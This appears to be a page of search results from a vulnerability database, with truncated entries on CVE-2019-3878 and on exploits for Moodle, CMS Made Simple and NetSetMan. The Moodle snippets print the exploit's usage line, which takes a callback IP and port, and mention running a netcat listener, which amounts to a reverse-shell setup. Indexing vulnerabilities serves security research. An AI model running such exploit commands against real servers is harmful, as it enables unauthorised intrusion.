
7042 matches found

OSV
added 2019/03/26 6:29 p.m., 2 views

DEBIAN-CVE-2019-3878

A vulnerability was found in mod_auth_mellon before v0.14.2. If Apache is configured as a reverse proxy and mod_auth_mellon is configured to only let through authenticated users with the require valid-user directive, adding special HTTP headers that are normally used to start the special SAML ECP...

CVSS 8.1, AI score 7.6, EPSS 0.02011
Exploits 1, References 1

Debian CVE
added 2019/03/26 5:44 p.m., 25 views

CVE-2019-3878

A vulnerability was found in mod_auth_mellon before v0.14.2. If Apache is configured as a reverse proxy and mod_auth_mellon is configured to only let through authenticated users with the require valid-user directive, adding special HTTP headers that are normally used to start the special SAML ECP...

CVSS 8.1, AI score 8, EPSS 0.02011
Exploits 1

CVE
added 2019/03/26 5:44 p.m., 148 views

CVE-2019-3878

The CVE-2019-3878 issue affects mod_auth_mellon for Apache before v0.14.2. When Apache runs as a reverse proxy and mod_auth_mellon is set to require valid-user, an attacker can bypass authentication by sending specific HTTP headers used in SAML ECP (non-browser) flows. The connected advisories in...

CVSS 8.1, AI score 7.7, EPSS 0.02011
Exploits 1, References 9, Affected Software 1

pentestit
added 2019/03/23 4:6 a.m., 214 views

UPDATE: AutoSploit 3.0 – The New Year’s edition

PenTestIT RSS Feed I wrote about AutoSploit in a post titled AutoSploit = Shodan/Censys/Zoomeye + Metasploit and its subsequent update to AutoSploit 2.2. Recently, AutoSploit 3.0 was released. This post tries to describe the changes between the last release and the newest version as this release...

Exploits 0

Securelist
added 2019/03/21 4:0 p.m., 868 views

Hacking microcontroller firmware through a USB

In this article, I want to demonstrate extracting the firmware from a secure USB device running on the Cortex M0. Who hacks video game consoles? The manufacture of counterfeit and unlicensed products is widespread in the world of video game consoles. It's a multi-billion dollar industry in which...

CVSS 7.2, AI score 7.9, EPSS 0.05409
Exploits 8

UbuntuCve
added 2019/03/21 12:0 a.m., 28 views

CVE-2019-3878

A vulnerability was found in mod_auth_mellon before v0.14.2. If Apache is configured as a reverse proxy and mod_auth_mellon is configured to only let through authenticated users with the require valid-user directive, adding special HTTP headers that are normally used to start the special SAML ECP...

CVSS 8.1, AI score 7.1, EPSS 0.02011
Exploits 1, References 4

OSV
added 2019/03/21 12:0 a.m., 1 views

UBUNTU-CVE-2019-3878

A vulnerability was found in mod_auth_mellon before v0.14.2. If Apache is configured as a reverse proxy and mod_auth_mellon is configured to only let through authenticated users with the require valid-user directive, adding special HTTP headers that are normally used to start the special SAML ECP...

CVSS 8.1, AI score 7.2, EPSS 0.02011
Exploits 1, References 5

exploitpack
added 2019/03/15 12:0 a.m., 61 views

Moodle 3.4.1 - Remote Code Execution

Moodle 3.4.1 - Remote Code Execution php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure...

CVSS 6.5, AI score 9, EPSS 0.40785
Exploits 5

0day.today
added 2019/03/15 12:0 a.m., 1630 views

Moodle 3.4.1 - Remote Code Execution Exploit

Exploit for php platform in category web applications php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the...

CVSS 6.5, AI score 8.8, EPSS 0.40785
Exploits 5

exploitpack
added 2019/03/15 12:0 a.m., 27 views

CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload

CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload !/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org...

Exploits 0

Exploit DB
added 2019/03/15 12:0 a.m., 198 views

CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload

!/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org/ Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtim...

AI score 7.4
Exploits 0

CNVD
added 2019/03/15 12:0 a.m., 1 views

SQL injection vulnerability in joomla! Boo*** component rev*** function

joomla! is an open source content management system CMS. A SQL injection vulnerability exists in the joomla! Boo component rev function. The vulnerability allows attackers to obtain sensitive information about the database...

AI score 7.7
Exploits 0

Packet Storm
added 2019/03/15 12:0 a.m., 113 views

Moodle 3.4.1 Remote Code Execution

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure you're running a netcat listener on the...

CVSS 6.5, AI score 8.8, EPSS 0.40785
Exploits 5

Packet Storm
added 2019/03/15 12:0 a.m., 85 views

CMS Made Simple Showtime2 3.6.2 Arbitrary File Upload

!/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org/ Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtim...

CVSS 5, AI score 0.2, EPSS 0.5929
Exploits 7

0day.today
added 2019/03/11 12:0 a.m., 111 views

NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode) Exploit

Exploit for windows platform in category local exploits Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow SEH Unicode Exploit Author: Devin Casadey Vendor Homepage: https://www.netsetman.com/ Software Link: https://www.netsetman.com/netsetman.exe Tested Version: 4.7.1 Tested on: Windows XP S...

Exploits 0

exploitpack
added 2019/03/11 12:0 a.m., 11 views

NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)

NetSetMan 4.7.1 - Local Buffer Overflow SEH Unicode Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow SEH Unicode Exploit Author: Devin Casadey Discovery Date: 2019-03-11 Vendor Homepage: https://www.netsetman.com/ Software Link: https://www.netsetman.com/netsetman.exe Tested Version: 4.7.1...

AI score 0.3
Exploits 0

Packet Storm
added 2019/03/11 12:0 a.m., 42 views

NetSetMan 4.7.1 Buffer Overflow

Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow SEH Unicode Exploit Author: Devin Casadey Discovery Date: 2019-03-11 Vendor Homepage: https://www.netsetman.com/ Software Link: https://www.netsetman.com/netsetman.exe Tested Version: 4.7.1 Tested on: Windows XP SP3...

AI score 0.7
Exploits 0

Kitploit
added 2019/03/10 8:25 p.m., 185 views

Reverse Shell Cheat Sheet

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either throwing back a...

AI score 7
Exploits 0, References 1

Hacker One
added 2019/03/09 2:1 p.m., 9 views

50m-ctf: `Cody trolled us all` h1-702 CTF write-up

Premise I use not to play CTF challenges because they usually absorb me entirely. I cannot think of anything else but "I want that flag!". That said, this is going to be a long story: no princess, no dragoons, only a tweet. https://twitter.com/Hacker0x01/status/1100543680383832065 Level 0 - Nothi...

AI score 7.2
Exploits 0

Trend Micro Simply Security
added 2019/03/08 3:0 p.m., 40 views

This Week in Security News: IoT Threats and Risks

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the threats and risks to complex IoT environments. Also, learn about new security challenges and risks the food production...

AI score 6.9
Exploits 0